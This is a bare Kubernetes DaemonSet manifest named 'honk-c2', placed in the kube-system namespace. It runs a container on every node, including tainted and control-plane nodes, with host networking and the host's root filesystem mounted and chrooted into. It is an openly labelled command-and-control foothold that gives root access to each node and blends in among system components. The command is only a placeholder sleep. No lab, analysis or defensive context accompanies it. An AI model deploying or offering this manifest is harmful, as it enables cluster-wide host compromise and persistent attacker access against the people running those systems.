---
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: honk-c2
  namespace: kube-system
  labels:
    k8s-app: c2
spec:
  selector:
    matchLabels:
      k8s-app: c2
  template:
    metadata:
      labels:
        k8s-app: c2
    spec:
      hostNetwork: true
      containers:
      - name: c2
        image: busybox:latest
        command:
        - chroot
        - /rootfs
        - /bin/bash
        - -c
        - |
          sleep 10000
        volumeMounts:
        - mountPath: /rootfs
          name: rootfs
      volumes:
      - name: rootfs
        hostPath:
          path: /
      tolerations:
      - effect: NoSchedule
        operator: Exists
      - effect: NoExecute
        operator: Exists
      - key: CriticalAddonsOnly
        operator: Exists
